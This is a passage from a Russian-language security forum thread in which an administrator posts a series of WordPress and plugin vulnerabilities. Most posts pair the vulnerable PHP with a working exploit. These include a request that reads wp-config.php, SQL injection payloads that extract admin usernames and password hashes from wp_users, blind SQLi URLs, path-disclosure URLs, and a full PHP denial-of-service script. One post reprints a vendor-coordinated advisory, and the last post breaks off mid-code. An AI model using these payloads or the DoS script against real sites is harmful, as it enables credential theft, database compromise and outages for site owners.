ГлавнаяРегистрацияВход
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 6 из 7
  • «
  • 1
  • 2
  • 4
  • 5
  • 6
  • 7
  • »
Проверка сайта на уязвимости! » Форум » Уязвимости » Обзор уязвимостей WordPress
Обзор уязвимостей WordPress
DecideДата: Среда, 14.11.2012, 11:03 | Сообщение # 76
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Plugin name: jRSS Widget (download)
Version: 1.0

File Disclosure

Vuln file: /wp-content/plugins/jrss-widget/proxy.php
PHP код:
header('Content-type: application/xml');
$handle = fopen($_REQUEST['url'], "r");

if ( $handle ) {
while ( !feof($handle) ) {
$buffer = fgets($handle, 4096);
echo $buffer;
}
fclose($handle);
}
Exploit:
Код:
POST http://[host]/[path]/wp-content/plugins/jrss-widget/proxy.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

url=../../../wp-config.php
 
DecideДата: Среда, 14.11.2012, 11:04 | Сообщение # 77
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Wordpress 2.9.2 Passive XSS

Search.php

Сразу оговорюсь, данная уязвимость присутствует не во всех wp-темах.

Рассмотрим тему Simple Balance

search.php:
PHP код:
<?php include (TEMPLATEPATH . '/header.php'); ?>

<div id="page">

<?php
if (!isset($theme_options["layout_style"]) || $theme_options["layout_style"] == "scs") {
include (TEMPLATEPATH . '/lsidebar.php');
}
?>

<div id="content">

<?php include (TEMPLATEPATH . '/topads.php'); ?>

<h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4>

<?php if (have_posts()) : ?>
<?php while (have_posts()) : the_post(); ?>
<div class="post">
<div class="postTitle"><h2><a href="<?php the_permalink() ?>" rel="bookmark" title="<?php the_title(); ?>"><?php the_title(); ?></a></h2></div>
<div class="postInfo">Опубликовано <?php the_time('d.m.Y'); ?> в рубрике <?php the_category(', ') ?> <?php edit_post_link('изменить', '(', ')'); ?></div>

<div class="postContent">
<?php the_excerpt(); ?>
</div>

<?php if(function_exists('the_tags')) { ?><div class="postExtras"><strong>Метки:</strong> <?php the_tags('', ', ', ''); ?></div><?php } ?>

<div class="postMeta">
<span class="postLink"><a href="<?php the_permalink() ?>" title="<?php the_title(); ?>">Читать пост</a></span>
<?php
$comNo = get_comment_type_count('comment'); // Checking if there are any actual comments (trackbacks and pingbacks excluded)

if ($comNo == 1 ) {
?>
<span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Один комментарий', 'Комментариев '.$comNo.''); ?></span>
<?php }
elseif ($comNo > 1) {
?>
<span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Один комментарий', 'Комментариев '.$comNo.''); ?></span>
<?php }
else {
?>
<span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Прокомментируете?', 'Прокомментируете?'); ?></span>
<?php } ?>
</div>
</div>
<?php endwhile; ?>

<div class="navigation">
<div class="left"><?php previous_posts_link('« В будущее') ?></div>
<div class="right"><?php next_posts_link('В прошлое »') ?></div>
</div>

<?php else: ?>
Ничего не найдено.<br />
Извините, по вашему запросу ничего не найдено. Возможно, вам стоит изменить параметры поиска?
<?php endif; ?>
</div>

<?php
if (isset($theme_options["layout_style"]) && $theme_options["layout_style"] == "css") {
include (TEMPLATEPATH . '/lsidebar.php');
}
?>

<?php include (TEMPLATEPATH . '/rsidebar.php'); ?>

</div>

<?php include (TEMPLATEPATH . '/footer.php'); ?>

нас интересует только:
PHP код:
<h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4>

Как видим, скрипт выводит параметр $s, никак не фильтруя его.
Соответственно если передать скрипту js код в теге <script>, он выполнится.
 
DecideДата: Среда, 14.11.2012, 11:04 | Сообщение # 78
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
WordPress 3.0.1
поковырялся немного и нашел пути

Раскрытие пути:
Код:

http://localhost/wordpress/wp-admin/edit.php?post_type[]=page
http://localhost/wordpress/wp-admin/options-general.php?page[]=
http://localhost/wordpress/wp-admin/post-new.php?post_type[]=page
http://localhost/wordpre....ged[]=1
http://localhost/wordpress/wp-admin/plugin-editor.php?file[]=
 
DecideДата: Среда, 14.11.2012, 11:04 | Сообщение # 79
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Description: SQL injection vulnerability in do_trackbacks() function of WordPress allows remote attackers to execute arbitrary SELECT SQL query.
Access Vector: Network
Attack Complexity: Medium
Authentication: Single Instance
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None

Code
UPDATE Dec 1, 2010: This vulnerability was first discovered by M4g and is described in this  
article.  
    
The do_trackbacks() function in wp-includes/comment.php does not properly escape the input that  
comes from the user, allowing a remote user with publish_posts and edit_published_posts  
capabilities to execute an arbitrary SELECT SQL query, which can lead to disclosure of any  
information stored in the WordPress database.  
    
function do_trackbacks($post_id) {  
     global $wpdb;  
     
     $post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) );  
     $to_ping = get_to_ping($post_id);  
     $pinged  = get_pung($post_id);  
     if ( empty($to_ping) ) {  
         $wpdb->update($wpdb->posts, array('to_ping' => ''), array('ID' => $post_id) );  
         return;  
     }  
     
     if ( empty($post->post_excerpt) )  
         $excerpt = apply_filters('the_content', $post->post_content);  
     else  
         $excerpt = apply_filters('the_excerpt', $post->post_excerpt);  
     $excerpt = str_replace(']]>', ']]>', $excerpt);  
     $excerpt = wp_html_excerpt($excerpt, 252) . '...';  
     
     $post_title = apply_filters('the_title', $post->post_title);  
     $post_title = strip_tags($post_title);  
     
     if ( $to_ping ) {  
         foreach ( (array) $to_ping as $tb_ping ) {  
             $tb_ping = trim($tb_ping);  
             if ( !in_array($tb_ping, $pinged) ) {  
                 trackback($tb_ping, $post_title, $excerpt, $post_id);  
                 $pinged[] = $tb_ping;  
             } else {  
                 $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) );  
             }  
         }  
     }  
}  
    
The $tb_ping variable is passed to the query in line 1657 unescaped.  
    
Exploitation. The logged in user must have publish_posts and edit_published_posts capabilities  
(this corresponds to the Author role).  
    
First, the user creates a new post (title/content does not matter); text to put into the “Send Trackbacks” field is:  
    
AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’    
    
and publishes it. He needs to wait a bit — for wp-cron.php to process the trackback. The get_to_ping() function says that this trackback is to be processed:  
    
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'    
    
Then the user goes back and edits the post.  
    
Now the user duplicates the text in the “Send Trackbacks” field and updates the post:  
    
AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’    
    
AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’    
    
The get_to_ping() function says that these trackbacks are to be processed:  
    
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'    
    
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'    
    
Query logging shows that WordPress executes this query (reformatted for the sake of readbility):  
    
UPDATE wp_posts  
SET to_ping = TRIM(REPLACE(to_ping, 'AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'  ', ''))  
WHERE ID = 11  
    
After that when the user refreshes the page (he may need to wait a bit for wp-cron.php to complete), the admin information is shown in the input box.  
    
Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.  
The screenshots above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.  
    
Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.  
The examples above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.
 
DecideДата: Среда, 14.11.2012, 11:05 | Сообщение # 80
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Wordpress 3.0.1 - Remote Denial Of Service Exploit
Code
<?php  

// Curl php5 <img src="http://s49.ucoz.net/sm/1/wink.gif" border="0" align="absmiddle" alt="wink" />  

function info()  
{  
     echo "##################################################  ################\n";  
     echo "# Wordpress 3.0.1 - Remote Denial Of Service Exploit\n";  
     echo "# Author: KnocKout\n";  
     echo "# Greatz : DaiMon,BARCOD3\n";  
     echo "##################################################  ################\n";  
     echo "# php poc.php target\n";  
     echo "# php poc.php http://www.victim.com/PATH/ 20 5\n";  
     echo "________________________________________\n";  
     exit;  
}  

if($argc !== 4 || !preg_match('#^\d+$#', $argv[2]) || !preg_match('#^\d+$#', $argv[3]))  
{  
     info();  
}  

$url = $argv[1];  
$threads = (int) $argv[2];  
$timeout = (int) $argv[3];  

$ptimeout = $timeout * 100;  

$packet = implode('+', range(100,999));  

while(1)  
{  
     $m = curl_multi_init();  

     for($i = 0; $i < $threads; $i++)  
     {  
         $c[$i] = curl_init();  
         $opts = array  
         (  
             CURLOPT_URL        => $url . 'wp-links-opml.php?link_cat=--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0',  
             CURLOPT_USERAGENT    => 'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.5.24 Version/10.52',  
             CURLOPT_ENCODING    => 'gzip, deflate',  
             CURLOPT_POST        => 1,  
             CURLOPT_POSTFIELDS    => 'search_keywords='. $packet .'000000000000000000000000000000000000000000000000  0000000000000000000000000000000000000000000',  
             CURLOPT_RETURNTRANSFER    => 1,  
             CURLOPT_TIMEOUT        => $timeout,  
         );  
         curl_setopt_array($c[$i], $opts);  
         curl_multi_add_handle($m, $c[$i]);  
     }  

     $t = 0;  
     do  
     {  
         curl_multi_exec($m, $r);  
         usleep(100000);  

         $t++;  

         if($t > $ptimeout)  
         {  
             curl_multi_close($m);  
             for($i = 0; $i < $threads; $i++)  
             {  
                 curl_close($c[$i]);  
             }  
             break;  
         }  
     }  
     while($r > 0);  

     echo '.';  
}  
?>
 
DecideДата: Среда, 14.11.2012, 11:05 | Сообщение # 81
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
WordPress 3.1.3 SQL Injection Vulnerabilities

Code
SEC Consult Vulnerability Lab Security Advisory < 20110701-0 >
==================================================  =====================
               title: Multiple SQL Injection Vulnerabilities
             product: WordPress
  vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
       fixed version: 3.1.4/3.2-RC3
              impact: Medium
            homepage: http://wordpress.org/
               found: 2011-06-21
                  by: K. Gudinavicius                             
                      SEC Consult Vulnerability Lab
                      https://www.sec-consult.com
==================================================  =====================
   
Vendor description:
-------------------
"WordPress was born out of a desire for an elegant, well-architectured
personal publishing system built on PHP and MySQL and licensed under
the GPLv2 (or later). It is the official successor of b2/cafelog.
WordPress is fresh software, but its roots and development go back to
2001."
   
Source: http://wordpress.org/about/
   
   
   
Vulnerability overview/description:
-----------------------------------
Due to insufficient input validation in certain functions of WordPress
it is possible for a user with the "Editor" role to inject arbitrary
SQL commands. By exploiting this vulnerability, an attacker gains
access to all records stored in the database with the privileges of the
WordPress database user.
   
   
   
Proof of concept:
-----------------
1) The get_terms() filter declared in the wp-includes/taxonomy.php file
does not properly validate user input,  allowing an attacker with
"Editor" privileges to inject arbitrary SQL commands in the "orderby"
and "order" parameters passed as array members to the vulnerable filter
when sorting for example link categories.
   
The following URLs could be used to perform blind SQL injection
attacks:
   
http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL
injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL
injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL
injection]&order=[SQL injection]
   
   
2) The get_bookmarks() function declared in the
wp-includes/bookmark.php file does not properly validate user input,
allowing an attacker with "Editor" privileges to inject arbitrary SQL
commands in the "orderby" and "order" parameters passed as array
members to the vulnerable function when sorting links.
   
The following URL could be used to perform blind SQL injection attacks:
   
http://localhost/wp-admin/link-manager.php?orderby=[SQL
injection]&order=[SQL injection]
   
   
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in version 3.1.3 of
WordPress, which is the most recent version at the time of discovery.
   
   
Vendor contact timeline:
------------------------
2011-06-22: Contacting vendor through security () wordpress org
2011-06-22: Vendor reply, sending advisory draft
2011-06-23: Vendor confirms security issue
2011-06-30: Vendor releases patched version
2011-07-01: SEC Consult publishes advisory
   
   
   
Solution:
---------
Upgrade to version 3.1.4 or 3.2-RC3
   
   
Workaround:
-----------
A more restrictive role, e.g. "Author", could be applied to the user.
   
   
   
Advisory URL:
-------------
https://www.sec-consult.com/en/advisories.html
   
   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
   
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
   
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com
   
EOF K. Gudinavicius / @2011
 
DecideДата: Среда, 14.11.2012, 11:06 | Сообщение # 82
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
PLUGIN :: [0day] AlixcaN Canlı Yayın Eklentisi ver.1.0 [SQL-inj]

Code
<?php  
/*  
Plugin Name: AlixcaN LiveFeed  
Plugin URI: http://www.alixcan.net/wordpress/eklentiler/wordpress-canli-yayin-eklentisi-v1-0  
Description: Alixcan.Net Wordpress sitenizden facebook, twitter tarzı feedler atmanızı sağlayan sistem.  
Version: 1.0  
Author: AlixcaN | Alican Ertürk  
Author URI: http://www.alixcan.net  
*/  

$pluginadi = $_GET['plugin'];  
$parcala = explode('_',$pluginadi);  
if($_GET['action'] == 'activate' && $parcala[0]=='alixcan' && $parcala[1]=='live'){  
     mysql_query("  
CREATE TABLE IF NOT EXISTS `wp_alixlivefeed` (  
   `id` int(11) NOT NULL AUTO_INCREMENT,  
   `baslik` varchar(225) COLLATE utf8_turkish_ci NOT NULL,  
   `resim` text COLLATE utf8_turkish_ci NOT NULL,  
   `date` datetime NOT NULL,  
   PRIMARY KEY (`id`)  
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_turkish_ci AUTO_INCREMENT=1 ;  
");  
}  

function alixcan_live_feed_ali() {  
if(isset($_GET['feedlist']) == 'alix_feed_list'){  
         $sayfa_basina = 10;  
     $sayfa_sor = mysql_query("SELECT COUNT(`id`) FROM `wp_alixlivefeed`");  
     $sayfalar = ceil(mysql_result($sayfa_sor,0) / $sayfa_basina);  
       
     $sayfa = (isset($_GET['alix_sayfa'])) ? (int)abs($_GET['alix_sayfa']) : 1;  
     $basla = ($sayfa - 1) * $sayfa_basina;  
       
     $sql = mysql_query("SELECT * FROM wp_alixlivefeed LIMIT $basla,$sayfa_basina");  
     if(mysql_num_rows($sql)>0){echo '<h3>Gönderdiğiniz Feedler</h3>  
     <table cellpadding="5" style="border:1px solid #ddd; margin-bottom:5px;" cellspacing="5">  
     <tr>  
         <td style="width:5%; font-weight:bold">ID</td>  
         <td style="width:70%; font-weight:bold">Mesaj</td>  
         <td style="width:25%; font-weight:bold">Tarih</td>  
     </tr>  
     ';  
         while ($row = mysql_fetch_object($sql)){  
             echo '<tr>';  
                     echo '<td>'. $row->id.'</td>';  
                     echo '<td>'.$row->baslik.'</td>';  
                     echo '<td>'.$row->date.'</td>';  
             echo '</tr>';  
         }  
     }      
     echo '</table>';  
if($sayfalar>=1 && $sayfa <= $sayfalar){  
echo '<div class="sayfalar">Sayfalar: ';  
     $link = 'index.php?feedlist=alix_feed_list&';  
     for($x=1; $x<=$sayfalar; $x++){  
       
         echo '<a href="'.$link.'alix_sayfa='.$x.'">';  
         echo ($x == $sayfa) ? '<span>'.$x.'</span> ': '<em>'.$x.'</em> ';  
         echo '</a>';  
     }  
echo '</div>';  
}  
       
       
       
     echo '<p><a id ="upload_image" href="index.php">Feed Gönder</a></p>';  
}elseif(isset($_GET['edit']) == 'dashboard_alix_live#dashboard_alix_live'){  
     echo '<p>  
         Kullanımı Cok Basit Ve Bloğuna Bağlı Bir Yazar İçin Gayet Hoş Bir Eklenti.<br />  
         Facebooktaki "Ne Düşünüyorsunuz?" Mantığı İle Benzer. Bir Yazı, Resim Veya Hem Yazı Hem Resim Paylaşma İmkanı Sağlamaktadır.<br />  
         Bu Yazıları  
         <p style="margin-left:15px;">  
                   [alixcan_live_feed] - Tüm Yazıları Listeler  
             <br />[alixcan_live_feed id=""] - Belirlediğiniz Yazıyı İstediğiniz Yerde Listeler  
         </p>  
         Yukarıdaki Shortcodeları Kullanarak İstediğiniz Şekilde Listeletebilirsiniz.  
     </p>';  
} else{ ?>  

<?php if($_POST['submittwit']){  

$baslik    = $_POST['baslik'];  
$resim    = $_POST['upload_image'];  
$date   = $_POST['date'];  
global $wpdb;  

$veri_dizisi = array(  
         'baslik' => $baslik,   
         'resim'     => $resim,  
         'date'   => $date  
         );  
$wpdb->insert( 'wp_alixlivefeed', $veri_dizisi );  
echo 'Yazı Eklendi';  

} /*submittwit bitimi */?>  
<script>  
     jQuery(document).ready(function() {  

     jQuery('#upload_image_button').click(function() {  
      formfield = jQuery('#upload_image').attr('name');  
      tb_show('', 'media-upload.php?type=image&TB_iframe=true');  
      return false;  
     });  

     window.send_to_editor = function(html) {  
      imgurl = jQuery('img',html).attr('src');  
      jQuery('#upload_image').val(imgurl);  
      tb_remove();  
     }  
     });  
</script>  

<form action="" enctype="multipart/form-data" method="POST">  
       
     <p>  
         <label for="baslik">Başlık:<span style="color:red;font-size:9px">En Fazla 255 Karakter</span></label><br />  
         <input type="text" name="baslik" id="baslik" style="width:100%" />  
     </p>  
     <p>  
         <label for="upload_image">Resim:</label><br />  
         <input id="upload_image" type="text" size="36" name="upload_image" value="" />  
         <input id="upload_image_button" type="button" value="Resim Yükle" /><br />  
         Resim Dosyası Yükleyebilirsiniz Yada Direk Link Yazabilirsiniz.<span style="display:block;font-size:9px;color:red;">Dosya Yüklendikten Sonra Yazıya Dahil Et Butonuna Basınız Link Otomatik Eklenicektir</span>  
     </p>  
         <input type="hidden" id="date" name="date" value="<?php echo date("Y-m-d G:i:s");?>" />  
     <p class="submit">  
         <input type="submit" name="submittwit" id="submittwit" />  
     </p>  

</form>  
<p><a id ="upload_image" href="index.php?feedlist=alix_feed_list">Feedleri Listele</a></p>  
<?php  
} // else  
}  // function  

function alixcan_live_feed_setup() {  
     $yazi = (isset($_GET['edit']) == 'dashboard_alix_live#dashboard_alix_live') ? '<a href="index.php">Kapat</a>' : '<a href="index.php?edit=dashboard_alix_live#dashboard_alix_  live" class="edit-box open-box">Hakkında</a>';  
     wp_add_dashboard_widget( 'alixcan_live_feed_ali', __( 'Canlı Yayın & Live Feed<span class="postbox-title-action">'.$yazi.'</span>' ), 'alixcan_live_feed_ali' );  
}  
add_action('wp_dashboard_setup', 'alixcan_live_feed_setup');  

function head_ekle(){  
     echo '<link rel="stylesheet" href="'.WP_PLUGIN_URL.'/alixcan_live_f/style.css" type="text/css" />';  
}  
add_action('wp_head', 'head_ekle');  

add_shortcode('alixcan_live_feed', 'alixcan_live_feed_shortcode');  
function alixcan_live_feed_shortcode( $atts, $content = null){  
     global $post;  
     extract( shortcode_atts( array( 'id' => '' ) , $atts ) );  

     if(empty($id)){  
               
            
     $sayfa_basina = 10;  
     $sayfa_sor = mysql_query("SELECT COUNT(`id`) FROM `wp_alixlivefeed`");  
     $sayfalar = ceil(mysql_result($sayfa_sor,0) / $sayfa_basina);  
       
     $sayfa = (isset($_GET['alix_sayfa'])) ? (int)abs($_GET['alix_sayfa']) : 1;  
     $basla = ($sayfa - 1) * $sayfa_basina;  
       
     $sql = mysql_query("SELECT * FROM wp_alixlivefeed LIMIT $basla,$sayfa_basina");  
     if(mysql_num_rows($sql)>0){echo '<div id="alixcan">  
             <ul id="list">';  
     while ($row = mysql_fetch_object($sql)){  
         echo '<li>';  
                     echo (!empty($row->resim)) ? '<a href="'.$row->resim.'" target="_blank" title="'.$row->baslik.'"><img src="'.$row->resim.'" /></a>' : '';  
                     echo $row->baslik.'<br /><em>'.$row->date.'</em>  
                     <div style="clear:both;"></div>  
                     </li>  
                     ';  
     }echo '</ul>';  
     }else{  
         echo '<div style="display:block;float:none;">Henüz İçerik Girilmemiş</div>';  
     }  
       
       
if($sayfalar>=1 && $sayfa <= $sayfalar){  
echo '<div class="sayfalar">Sayfalar: ';  
     $link = get_option('home'). '?p='. get_the_ID();  
     for($x=1; $x<=$sayfalar; $x++){  
       
         echo '<a href="'.$link.'&alix_sayfa='.$x.'">';  
         echo ($x == $sayfa) ? '<span>'.$x.'</span> ': '<em>'.$x.'</em> ';  
         echo '</a>';  
     }  
echo '</div>';  
}  
     echo '</div>';  
    
     }else{  
           
          $sqlsor = mysql_query("SELECT * FROM wp_alixlivefeed WHERE id='$id'");  
             $row = mysql_fetch_object($sqlsor);  
             echo '<div id="alixcan">  
             <ul id="list">';  
             echo '<li>';  
             echo (!empty($row->resim)) ? '<a href="'.$row->resim.'" target="_blank" title="'.$row->baslik.'"><img src="'.$row->resim.'" /></a>' : '';  
             echo $row->baslik.'<br /><em>'.$row->date.'</em>  
             <div style="clear:both;"></div>  
             </li>  
             </ul>  
             </div>';  
           
     }//else  
}// func biter


Exploit:
http://wp/?alixca....x3a,use r_pass+SEPARATOR+0x3c62723e),2,3,4+FROM+wp_users--
 
DecideДата: Среда, 14.11.2012, 11:07 | Сообщение # 83
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability

Code
# Exploit Title: ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/proplayer.4.7.7.zip
# Version: 4.7.7 (tested)
   
---
PoC
---
http://www.site.com/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20
   
---------------
Vulnerable code
---------------
function getPlaylist($id = '') {
     $query = mysql_query("SELECT * FROM ".$this->tablePrefix."proplayer_playlist WHERE (POST_ID='$id')");
     $playlistRow = mysql_fetch_row($query);
       
     return $this->withBackwardCompatibility($playlistRow[2]);
}
   
...
   
if (!empty($_GET["pp_playlist_id"])) {
     header("Content-type: application/xml");
     $xml = $playlistController->getPlaylist($_GET["pp_playlist_id"]);
 
DecideДата: Среда, 14.11.2012, 11:07 | Сообщение # 84
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Media Library Categories <= 1.0.6 SQL Injection Vulnerability

# Exploit Title: Media Library Categories <= 1.0.6 SQL Injection Vulnerability
# Date: 2011-08-06
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin....0.6.zip
# Version: 1.0.6 (tested)

---
PoC
---
http://www.site.com/wp-cont....rmid=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL--%20

http://www.site.com/wp-cont....ermid=1 AND EXTRACTVALUE(1,CONCAT(CHAR(92),@@version))

---------------
Vulnerable code
---------------
$termid=$_GET['termid'];

...

$where = '';
if($termid)
{
$where .= " && tt.term_id=".$termid;
}

...

$query = "SELECT p.*, a.term_order FROM " . $table_prefix . "posts p
inner join " . $table_prefix . "term_relationships a on a.object_id = p.ID
inner join " . $table_prefix . "term_taxonomy ttt on ttt.term_taxonomy_id = a.term_taxonomy_id
inner join " . $table_prefix . "terms tt on ttt.term_id = tt.term_id
where ttt.taxonomy='media_category' $where order by a.term_order asc;";

$results = mysql_query($query);
 
DecideДата: Среда, 14.11.2012, 11:07 | Сообщение # 85
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
WordPress IP-Logger Plugin <= 3.0 SQL Injection Vulnerability

Code
# Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-16
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip
# Version: 3.0 (tested)
   
---
PoC
---
http://www.site.com/wp-content/plugins/ip-logger/map-details.php?lat=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=-1&blocked=-1
   
---------------
Vulnerable code
---------------
$sql = sprintf("select stamp,ip_v4,url,user_agent,Provider,Code3,Country,  Blocked,Ignored from $table_name
   where Latitude=%s and Longitude=%s and Blocked = '%s'
   order by stamp asc limit 50",
   $_REQUEST["lat"],
   $_REQUEST["lon"],
   $_REQUEST["blocked"]);
   
$res = mysql_query($sql);
 
DecideДата: Среда, 14.11.2012, 11:08 | Сообщение # 86
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Exploit Title: WordPress Collision Testimonials plugin
Code
# Exploit Title: WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/collision-testimonials.zip
# Version: 3.0 (tested)
# Note: user has to be logged in as "admin"
---
PoC
---
http://www.site.com/wp-admin/admin.php?page=testimonials&featQuote&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,11  2))),0)
   
---------------
Vulnerable code
---------------
if (isset($_GET['featQuote'])) {
  $id = $_GET['id'];
  mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id");
 
DecideДата: Среда, 14.11.2012, 11:08 | Сообщение # 87
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
DJ On Air Widget SQL-inj

Code
.....  
         $dj_ids = $wpdb->get_results("SELECT `meta`.`user_id` FROM ".$wpdb->prefix."usermeta AS `meta`  
                    WHERE `meta_key` = 'shifts'   
                    AND `meta_value` LIKE '%".$sDayTime."%';"     
                    );  

.....  

         foreach($dj_ids as $id) {  
             $fetch = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."users AS `user` WHERE `user`.`ID` = ".$id->user_id.";");  
               
             $djs[] = $fetch;  
         }  
     .....


Code
http://wp/?dj-on-air=users&sdate=21-06-1945%+UNION+SELECT+1,2,3,4,5,group_concat(user_log  in,0x3a,user_pass+separator+0x3c62723e)+FROM+wp_us  ers+WHERE+ID+IN+(SELECT+user_id+FROM+wp_usermeta+W  HERE+meta_value=0x613A313A7B733A31333A2261646D696E  6973747261746F72223B623A313B7D)--+
 
DecideДата: Среда, 14.11.2012, 11:08 | Сообщение # 88
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Timthumb Vulnerability Scanner раскрытие путей
этот ваще пена xD
PHP код:
....
if(isset($_REQUEST['cg-action'])){
switch($_REQUEST['cg-action']){
case 'scan':
include_once 'cg-tvs-filescanner.php';
$scanner = new CG_FileScanner(WP_CONTENT_DIR);
$scanner->generate_inventory();
$scanner->scan_inventory();
update_option('cg_tvs_last_checked', date("Y-m-d H:i:s"));
update_option('cg_tvs_vulnerable_files', $scanner->VulnerableFiles);
update_option('cg_tvs_safe_files', $scanner->SafeFiles);
case 'fix':
$nonce = $_GET['_wpnonce'];
if(wp_verify_nonce($nonce, 'fix_timthumb_file')){
$fix_path = urldecode($_GET['file']);
$src_file_path = trailingslashit(dirname(__FILE__)).'cg-tvs-timthumb-latest.txt';
if(FALSE !== $fr = @fopen($src_file_path, 'r')){
$latest_src = fread($fr, filesize($src_file_path));
fclose($fr);
}else{
$message = "CAN'T READ TIMTHUMB SOURCE FILE";
break;
}
if(FALSE !== $fw = @fopen($fix_path, 'w')){
if(fwrite($fw, $latest_src)){
$message = "File <strong>".basename($fix_path)."</strong> at <em>".$fix_path."</em> successfully upgraded.";
}else{
$message = "Unknown file write error.";
}
}else{
$message = "CAN'T OPEN VULNERABLE FILE FOR WRITING";
break;
}
....

exploit:
Код:
http://wp/wp-cont....file[]=
 
DecideДата: Среда, 14.11.2012, 11:09 | Сообщение # 89
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
WP Photo Album Plus 4.0.12

Code
Blind SQLi @ wppa-functions.php:  

Код:

function wppa_crumb_page_ancestors($sep, $page = '0') {
global $wpdb;
global $wppa;
   
  $query = "SELECT post_parent FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $page . " LIMIT 0,1";
  $parent = $wpdb->get_var($query);
  if (!is_numeric($parent) || $parent == '0') return;
  wppa_crumb_page_ancestors($sep, $parent);
  $query = "SELECT post_title FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $parent . " LIMIT 0,1";
  $title = $wpdb->get_var($query);
  if (!$title) {
   $title = '****';  // Page exists but is not publish
